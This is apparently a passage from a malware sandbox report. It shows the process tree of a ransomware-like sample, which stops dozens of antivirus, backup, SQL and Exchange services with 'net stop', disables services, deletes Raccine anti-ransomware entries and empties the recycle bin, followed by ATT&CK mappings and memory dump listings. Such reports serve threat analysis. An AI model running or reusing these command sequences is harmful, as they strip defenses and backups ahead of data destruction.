    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:8176
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:2824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:8184
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:2532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:7816
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:7652
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.39
  2⤵
  PID:6916
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:2960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:2700
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:3160
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:2088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:7432
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6276
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:3808
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:3344
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2304
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:2860
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:2052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:7024
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:2444
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:2832
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:796
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:7032
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
    3⤵
    PID:6848
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2780
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:2748
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    3⤵
    PID:7016
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:2108
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:2220
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2400
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:1552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    3⤵
    PID:6824
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:1064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:6832
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:616
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:700
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:684
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:2664
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:2632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:7048
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:7068
- C:\Windows\system32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:2264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Enterprise Client Service” /y
    3⤵
    PID:7080
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:2340
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:2476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:6788
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:2552
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:2236
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:1012
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:1376
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:916
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:432
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:2308
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:2292
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2240
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.38
  2⤵
  PID:1384
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:2160
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2196
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:3052
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3032
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:2980
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2940
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2880
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:2848
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:2808
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:2752
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2728
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:2700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:7268
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2676
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:2604
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2416
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:2324
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2280
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:2260
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:2148
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2132
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:2104
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:2084
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:1672
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1640
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1316
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1604
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1384
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1504
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1676
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1832
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:324
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1376
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAEBE.bat
  2⤵
  PID:2284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start upnphost /y
1⤵
PID:2360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:2376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:2404

C:\Windows\system32\net.exe
net view
1⤵
- Discovers systems in the same network
PID:3268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:2164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:4728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1⤵
PID:4760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:4888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:4736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:4912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:5468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:5452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:5484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:5368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:5384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:6284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:6276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:6252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:6260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:5136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:5188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:1392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:5392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:6148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:6188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:6172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:6164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:5512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:6228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:6196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:6856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:6840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:7008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:6816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:6236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:6244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Dnscache /y
1⤵
PID:2352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:2456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
1⤵
PID:2444
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
  2⤵
  PID:3108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:2436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:2428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:7280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:7904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:7976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/372-60-0x0000000000D10000-0x0000000000D11000-memory.dmp

Filesize
4KB

Download
memory/372-62-0x000000001AFF0000-0x000000001AFF2000-memory.dmp

Filesize
8KB

Download
memory/468-76-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/468-97-0x00000000027D0000-0x00000000027D1000-memory.dmp

Filesize
4KB

Download
memory/468-98-0x00000000027E0000-0x00000000027E1000-memory.dmp

Filesize
4KB

Download
memory/468-84-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/468-68-0x0000000001D40000-0x0000000001D41000-memory.dmp

Filesize
4KB

Download
memory/468-65-0x000007FEFBF11000-0x000007FEFBF13000-memory.dmp

Filesize
8KB

Download
memory/468-81-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/468-78-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/468-75-0x0000000002924000-0x0000000002926000-memory.dmp

Filesize
8KB

Download
memory/468-72-0x0000000002920000-0x0000000002922000-memory.dmp

Filesize
8KB

Download
memory/1684-70-0x000000001ACB0000-0x000000001ACB1000-memory.dmp

Filesize
4KB

Download
memory/1684-73-0x000000001AC30000-0x000000001AC32000-memory.dmp

Filesize
8KB

Download
memory/1684-74-0x000000001AC34000-0x000000001AC36000-memory.dmp

Filesize
8KB

Download
memory/2116-175-0x0000000002070000-0x0000000002071000-memory.dmp

Filesize
4KB

Download
memory/2116-176-0x000000001AC40000-0x000000001AC42000-memory.dmp

Filesize
8KB

Download